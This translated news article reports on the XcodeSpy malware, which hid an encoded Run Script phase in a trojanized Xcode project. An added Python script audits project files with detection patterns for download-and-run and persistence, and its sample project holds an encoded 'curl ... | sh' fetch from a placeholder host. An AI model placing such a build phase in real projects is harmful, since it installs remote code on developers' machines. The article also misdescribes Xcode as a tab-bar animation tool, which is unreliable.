Apple developers in the crosshairs: Xcode attacked once again
By Carol
CSDN (csdnnews)
Researchers recently reported finding a trojanized code base, "XcodeSpy", in the wild. It is a brand-new piece of malware aimed at Xcode developers: it uses the coding platform's scripting feature to install a backdoor on affected machines.
Developers use Xcode to build applications for iPhone, iPad, Mac and other devices; the malware infects the Xcode integrated development environment (IDE) on macOS.
Launched and run as a script
Xcode is the free development tool Apple provides to developers writing applications for iOS and Apple's other operating systems. It lets developers easily animate an iOS tab bar in response to user interaction, and it serves as the repository holding all the files, resources and information an application needs.
According to security experts, the attackers use the IDE's Run Script feature to infect Apple developers who use Xcode projects. Researchers also found that the attackers built a malicious version of a legitimate project hosted on GitHub (the original project provides iOS developers with advanced animation for the iOS tab bar) and then infected Apple developers with this so-called "trojanized Xcode project".
The malicious version carries a "Run Script" phase that executes when the developer's build launches. It automatically downloads and installs a custom variant of the EggShell backdoor with a persistence mechanism, and then spies on the user through the microphone, camera and keyboard.
Easy to overlook, hard for the system to catch
The attack relies on Xcode's Run Script feature. Because the feature lets developers run a custom shell script when an application instance launches, the attack is easy to overlook: nothing in the console or debugger indicates that the malicious version has run.
Experienced developers should appreciate the importance of checking third-party Xcode projects for malicious scripts before using them. Although such scripts are not hard to find, the XcodeSpy attack also tries to make detection harder by encoding the script.
As shown in the image above, once a developer decodes it, it is clear that the script contacts the cralev server and then sends the mysterious command "mdbcmd" through the reverse shell built into the server.
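The check and the decoding step described in the two paragraphs above, as an added example that is not part of the article and not code from any of the researchers it cites: a Python script that reads an Xcode project.pbxproj, extracts every PBXShellScriptBuildPhase (the Run Script build phase), decodes any embedded base64 blobs, and flags common obfuscation, download-and-execute and persistence indicators. The project-file excerpt, the indicator labels and the placeholder payload URL (example.invalid) are all constructed for this example.

```python
import base64
import re
import string

# Indicators a reviewer looks for in a Run Script phase: decoding/obfuscation,
# download-and-execute, and persistence. The labels are our own (constructed).
INDICATORS = {
    "base64 decode": re.compile(r"\bbase64\b[^\n|]*(?:-[dD]\b|--decode)"),
    "eval of dynamic text": re.compile(r"\beval\b"),
    "download piped to interpreter": re.compile(
        r"\b(?:curl|wget)\b[^\n]*\|\s*(?:sudo\s+)?(?:sh|bash|zsh|python3?)\b"),
    "openssl decrypt": re.compile(r"\bopenssl\s+enc\b[^\n]*\s-d\b"),
    "inline interpreter one-liner": re.compile(r"\b(?:python3?|perl)\s+-[ce]\b"),
    "launch agent persistence": re.compile(r"LaunchAgents|launchctl\s+(?:load|bootstrap)\b"),
}

# project.pbxproj is an old-style plist made of "<id> /* <name> */ = { ... };" entries.
# A Run Script phase contains no nested dictionaries, so a non-greedy match up to the
# first "};" is enough to isolate it.
BLOCK_RE = re.compile(r"(\w+)\s*/\*\s*([^*]*?)\s*\*/\s*=\s*\{(.*?)\};", re.DOTALL)
SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.DOTALL)
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def unescape_pbx(s):
    """Undo pbxproj string escapes (backslash-n, backslash-t, escaped quote and backslash)."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def decode_embedded_base64(script):
    """Return the printable-text decodings of any base64-looking tokens in the script."""
    decoded = []
    for tok in B64_TOKEN_RE.findall(script):
        try:
            raw = base64.b64decode(tok, validate=True)
        except ValueError:
            continue  # not valid base64 (e.g. a long path or identifier)
        text = raw.decode("ascii", errors="replace")
        if text and sum(c in string.printable for c in text) / len(text) > 0.95:
            decoded.append(text)
    return decoded


def audit_pbxproj(text):
    """List every Run Script build phase with the indicators found in its script and in
    anything the script base64-decodes. An empty 'indicators' list means nothing was flagged."""
    findings = []
    for ident, name, body in BLOCK_RE.findall(text):
        if not re.search(r"isa\s*=\s*PBXShellScriptBuildPhase\s*;", body):
            continue
        m = SCRIPT_RE.search(body)
        script = unescape_pbx(m.group(1)) if m else ""
        decoded = decode_embedded_base64(script)
        hits = {"embedded base64 payload"} if decoded else set()
        for label, pattern in INDICATORS.items():
            if any(pattern.search(candidate) for candidate in [script, *decoded]):
                hits.add(label)
        findings.append({"id": ident, "name": name, "script": script,
                         "decoded": decoded, "indicators": sorted(hits)})
    return findings


# Constructed sample: a benign SwiftLint phase next to a phase whose stage-2 command is
# base64-encoded and piped into a shell. example.invalid is a reserved, non-resolving domain.
STAGE2 = base64.b64encode(b"curl -s https://example.invalid/stage2 | sh").decode()
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA11 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		BB22 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "echo @@STAGE2@@ | base64 --decode | sh\n";
		};
/* End PBXShellScriptBuildPhase section */
'''.replace("@@STAGE2@@", STAGE2)

if __name__ == "__main__":
    for f in audit_pbxproj(SAMPLE_PBXPROJ):
        status = "SUSPICIOUS" if f["indicators"] else "ok"
        print(f"{f['id']} ({f['name']}): {status} {f['indicators']}")
        for d in f["decoded"]:
            print("  decoded:", d)
```

To audit a real third-party project, read the text of MyApp.xcodeproj/project.pbxproj and pass it to audit_pbxproj; the function returns one entry per Run Script phase, with the decoded script so the reviewer can read it in full. This is a triage heuristic: a flagged phase deserves a line-by-line read, and an empty indicator list only means none of these patterns appeared, not that the script is safe.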
At the time of writing, the original version of the iOS tab bar project "TabBarInteraction" has not been tampered with and can be safely downloaded from GitHub.
Link: https://new.qq.com/omn/20210319/20210319A0ADX700.html
Update time: 2021-03-19 18:54:23